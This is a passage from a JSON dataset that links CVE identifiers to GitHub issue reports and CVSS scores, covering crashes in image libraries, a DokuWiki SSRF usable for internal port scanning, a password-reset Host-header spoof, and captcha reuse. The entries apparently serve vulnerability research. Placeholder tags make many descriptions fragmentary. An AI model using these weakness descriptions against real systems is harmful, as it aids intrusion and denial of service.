        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7906",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/281",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/281",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-09-30T10:20:54Z",
        "description": "imagemagick mogrify heap use after free. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG cfeba bp NUMBERTAG ffdebb9ff NUMBERTAG sp NUMBERTAG ffdebb9ff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG cfeb9 ( PATHTAG NUMBERTAG cf ( PATHTAG NUMBERTAG bfcfc ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG e NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-7954",
        "Issue_Url_old": "https://github.com/bundler/bundler/issues/5062",
        "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3374",
        "Repo_new": "rubygems/rubygems",
        "Issue_Created_At": "2016-10-06T22:07:52Z",
        "description": "Clarify documentation around global sources. As demonstrated by this blog post URLTAG , there is still a lot of end user confusion about how to deal with the source issues originally revealed in URLTAG A lot of that confusion is likely our fault as a team\u2014we often weren't sure what was and wasn't possible even as we were trying to fix the problem. As the above linked blog post mentions, the only way to be NUMBERTAG safe in Bundler NUMBERTAG is to have no global sources. The cross source confusion is eliminated in the (as yet unreleased) Bundler NUMBERTAG series by a series of backwards compatibility breaking changes to the format of the APITAG file and the way that Bundler handles gem sources internally. Once Bundler NUMBERTAG is out, you'll be able to use one global source and additional non global sources without worrying about any name conflicts. As a result of these problems, let's try to make it clearer for users what they need to do: FILETAG with clearer instructions around the possible problem and ways to avoid it ] Update the discussion of multiple sources in the Bundler docs to point out that this opens the possibility of name conflicts, and suggest using no global sources in Bundler NUMBERTAG Gemfiles. [ ] Update the existing warnings as needed to reflect the problems discussed in [the new blog post URLTAG This is a good chance for anyone to contribute, even if they aren't familiar with the Bundler code, since the explanations and warnings have all already been written down at least once. \ud83d\udc4d",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7954",
        "Issue_Url_old": "https://github.com/bundler/bundler/issues/5051",
        "Issue_Url_new": "https://github.com/rubygems/bundler/issues/5051",
        "Repo_new": "rubygems/bundler",
        "Issue_Created_At": "2016-10-05T02:08:29Z",
        "description": "CVETAG secondary sources. Hi, I'm just wondering where the code is at re this vulnerability? Is there a fix? URLTAG Apologies if I missed the answer to this q elsewhere. Thanks, ben",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7964",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1708",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1708",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2016-10-03T16:13:46Z",
        "description": "SSRF vulnerability in Dokuwiki. Hi, I found a ssrf vulnerability in dokuwiki. The APITAG method in APITAG Class(In file: APITAG has no restrict to access private network, such as NUMBERTAG APITAG APITAG This allows user to scan port of internal network. For example NUMBERTAG edit any page in dokuwiki NUMBERTAG Input APITAG NUMBERTAG Hit preview And the server will send a request to APITAG we can detect the port is open or not according to the response time. Hongkun Zeng hongkun. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7965",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1709",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1709",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2016-10-03T16:14:43Z",
        "description": "Password Reset Address Spoof Vulnerability in APITAG Hi, This is the another vulnerability i found in APITAG APITAG use $_SERVER[HTTP_HOST] to be a part of the password reset address. This can lead to phishing attacks because of the modification of the site's links. (A remote unauthenticated attacker can chenge the host in reset password address.) The vulnerability can be triggered only if the Host header is not part of the web server routing process (e.g. if several domains are served by the same web server). Vulnerable file FILETAG , and the APITAG method use $_SERVER[HTTP_HOST] to be a part of the URL. Solution: Use the variable $_SERVER[SERVER_NAME] instead of the variable $_SERVER[HTTP_HOST] given that the server name is correctly defined or use an application specific constant. Hongkun Zeng hongkun. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-8568",
        "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3936",
        "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3936",
        "Repo_new": "libgit2/libgit2",
        "Issue_Created_At": "2016-09-25T20:41:14Z",
        "description": "Read out of bounds in git_oid_nfmt. Hi, We found a read out of bounds parsing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf APITAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards,",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8569",
        "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3937",
        "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3937",
        "Repo_new": "libgit2/libgit2",
        "Issue_Created_At": "2016-09-26T01:19:42Z",
        "description": "APITAG using a null pointer derreference in git_commit_message. Hi, We found a null pointer derreference showing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf PATHTAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8579",
        "Issue_Url_old": "https://github.com/appc/docker2aci/issues/203",
        "Issue_Url_new": "https://github.com/appc/docker2aci/issues/203",
        "Repo_new": "appc/docker2aci",
        "Issue_Created_At": "2016-09-30T12:40:33Z",
        "description": "Infinite loop vulnerability in retrieving images chain. > Hi, > In code reviewing, i found an infinite loop vulnerability in retrieving images chain using docker2aci, it occurs during the corresponding json file parsing from user's image archive, fetching the parent image ID until ID is nil. There must be a possibility that the images chain may be a closed cycle, thus , docker2aci will fall into an infinite loop, that's indeed true by some interesting tests. > I think the core cause of this issue is lacking in essential check for duplicated image ID, such as the current image ID could not be equal to its parent image ID, most important, check whether the images chain is a closed cycle. > I processed some interesting test for this issue, building a crafted image whose top layer's parent ID points to itself, then an infinite loop occurred, this flaw caused excessive CPU cycles & resources consume on the host. > expecting subsequent discuss and fix the issue together, and could you request a CVE identifier for that ?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.0,
        "impactScore": 1.4,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2016-8600",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/9330",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/9330",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2016-07-06T19:49:07Z",
        "description": "Captcha can be programmatically reused by passing session id. If you use a captcha protected resource like the APITAG you can pass the same captcha again and again via curl if you use the session id cookie of the original request. Once the captcha has been checked and validated, we need to remove it from the user's session programmatically.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-8614",
        "Issue_Url_old": "https://github.com/ansible/ansible-modules-core/issues/5237",
        "Issue_Url_new": "https://github.com/ansible/ansible-modules-core/issues/5237",
        "Repo_new": "ansible/ansible-modules-core",
        "Issue_Created_At": "2016-10-12T13:54:58Z",
        "description": "security] apt_key module does not verify key fingerprints. ISSUE TYPE Bug Report COMPONENT NAME apt_key module ANSIBLE VERSION devel CONFIGURATION not relevant OS / ENVIRONMENT not relevant SUMMARY apt_key module does not verify key fingerprints and imports keys based on NUMBERTAG digits long id. This is a serious problem because it is easy to generate a APITAG key with a desired NUMBERTAG digit key IDs. Also, hkp is unauthenticated so it it becomes trivial to offer a wrong key to a victim. The problem is [this workaround URLTAG . STEPS TO REPRODUCE yaml name: Try to import key without verifying that we import the correct key hosts: APITAG become: True tasks: apt_key: id: APITAG keyserver: 'hkp://pool.sks APITAG EXPECTED RESULTS That key does not exist. No key is added. ACTUAL RESULTS The key id NUMBERTAG BC NUMBERTAG B is imported. EXAMPLE FIX Enforce correct key fingerprint with a trick such as: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-8654",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/94",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/94",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2016-11-25T18:06:13Z",
        "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake (different from NUMBERTAG overview Different from NUMBERTAG The vulnerability is found in jasper NUMBERTAG and is a Heap Buffer Overflow vulnerabilities. The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and APITAG The detail analysis report and APITAG file can be found in the attachment. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8654",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/93",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/93",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2016-11-25T17:57:27Z",
        "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake. Overview I have found a Heap Buffer Overflow vulnerability in jasper NUMBERTAG The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and Poc The detail analysis report and APITAG file can be found in the attachmen. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8659",
        "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/107",
        "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/107",
        "Repo_new": "containers/bubblewrap",
        "Issue_Created_At": "2016-10-13T09:36:29Z",
        "description": "privilege escalation via ptrace ( CVETAG ). Sebastian Krahmer reported this to the oss security mailing list URLTAG . I have not analyzed whether this is a practical vulnerability or whether it is based on some faulty assumption. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2016-8677",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/268",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/268",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-09-14T13:44:14Z",
        "description": "memory allocation failure in APITAG (quantum.c). A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-8678",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/272",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/272",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-09-14T13:56:59Z",
        "description": "heap based buffer overflow in APITAG (pixel accessor.h). A crafted image causes an heap overflow. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8862",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/271",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/271",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-09-14T13:55:47Z",
        "description": "memory allocation failure in APITAG (memory.c) different from NUMBERTAG A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-8882",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/30",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/30",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2016-10-16T22:51:00Z",
        "description": "segfault / null pointer access in jpc_pi_destroy. The attached file will crash jasper (can be tested with imginfo) with a null pointer access. It was found with american fuzzy lop. FILETAG Stack trace from address sanitizer NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fc8 sp NUMBERTAG fffa1dea NUMBERTAG T NUMBERTAG f NUMBERTAG e in jpc_pi_destroy PATHTAG NUMBERTAG f NUMBERTAG f in jpc_dec_tilefini PATHTAG NUMBERTAG bd in jpc_dec_process_eoc PATHTAG NUMBERTAG fb4 in jpc_dec_decode PATHTAG NUMBERTAG fb4 in jpc_decode PATHTAG NUMBERTAG f NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f NUMBERTAG cf in main PATHTAG NUMBERTAG f2ac NUMBERTAG f in __libc_start_main APITAG NUMBERTAG d8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in jpc_pi_destroy NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-8883",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/32",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/32",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2016-10-16T23:00:10Z",
        "description": "assert in APITAG The attached file causes an assert in the function jpc_dec_tiledecode. Found with american fuzzy lop. FILETAG Error message: imginfo: APITAG int jpc_dec_tiledecode(jpc_dec_t , jpc_dec_tile_t ): Assertion `dec >numcomps NUMBERTAG failed.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-9112",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/855",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/855",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-27T12:26:55Z",
        "description": "APITAG Point Exception) in PATHTAG Vulnerability openjpeg FPE in pi.c NUMBERTAG ersion openjpeg NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG b NUMBERTAG d NUMBERTAG f (pc NUMBERTAG b NUMBERTAG d NUMBERTAG f bp NUMBERTAG bfcb NUMBERTAG c8 sp NUMBERTAG bfcb NUMBERTAG T NUMBERTAG b NUMBERTAG d NUMBERTAG e ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbb NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e2bf ( PATHTAG NUMBERTAG b NUMBERTAG a2d6 ( PATHTAG NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG d ( PATHTAG NUMBERTAG b NUMBERTAG ab5a ( PATHTAG NUMBERTAG f7 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE ( PATHTAG ) GDB information Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb NUMBERTAG ed in opj_pi_next_cprl (pi NUMBERTAG dfb8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) p rpy NUMBERTAG gdb) p comp >dy <<< rpy A syntax error in expression, near `< rpy'. (gdb) p comp >dy APITAG dy APITAG dy << rpy). Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9113",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/856",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/856",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-29T03:21:27Z",
        "description": "NULL point derefence in function imagetobmp of convertbmp.c. DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG f NUMBERTAG pc NUMBERTAG cc0 bp NUMBERTAG bfad5d NUMBERTAG sp NUMBERTAG bfad5cc0 T NUMBERTAG cbf ( PATHTAG NUMBERTAG b8 ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetobmp (image NUMBERTAG b NUMBERTAG c0, outfile NUMBERTAG bfa3efd4 APITAG at PATHTAG NUMBERTAG r = image APITAG h ((i) / (w NUMBERTAG w + (i) % (w)]; (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG Analysis step1: p_image_dest APITAG = NULL APITAG step2: opj_j2k_exec (p_j2k,p_j2k APITAG APITAG > APITAG > APITAG p_j2k APITAG NUMBERTAG p_go_on NUMBERTAG l_go_on NUMBERTAG step3: APITAG the program accesses image APITAG However data is still NULL Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9114",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/857",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/857",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-29T08:19:23Z",
        "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eaf bp NUMBERTAG bfc NUMBERTAG a8 sp NUMBERTAG bfc NUMBERTAG T NUMBERTAG eae ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red = image APITAG (rr) p red NUMBERTAG int NUMBERTAG bfb NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG ++red; Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-9115",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/858",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/858",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-29T08:45:59Z",
        "description": "Heap Buffer Overflow in function imagetotga of APITAG DESCRIPTION OPENJPEG Heap Buffer Overflow in function imagetotga of APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b4a NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG bfcb8de8 sp NUMBERTAG bfcb8ddc READ of size NUMBERTAG at NUMBERTAG b4a NUMBERTAG thread T NUMBERTAG b1f ( PATHTAG NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b4a NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region NUMBERTAG b4a NUMBERTAG b4a NUMBERTAG allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG cb NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG faa NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG e NUMBERTAG fa fa fa[fa]fa NUMBERTAG f NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Analysis come soon Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9116",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/859",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/859",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-29T08:53:27Z",
        "description": "NULL Pointer Access in function imagetopnm of APITAG . DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG bfe NUMBERTAG sp NUMBERTAG bfe NUMBERTAG T NUMBERTAG e ( PATHTAG NUMBERTAG ce ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetoraw_common (image NUMBERTAG a NUMBERTAG c0, outfile NUMBERTAG bf8b NUMBERTAG APITAG big_endian NUMBERTAG at PATHTAG NUMBERTAG ptr = image APITAG (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) n NUMBERTAG for (line NUMBERTAG line APITAG APITAG = NULL and it was assigned to ptr, so the program accesses to ptr, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9117",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/860",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/860",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-10-29T09:30:52Z",
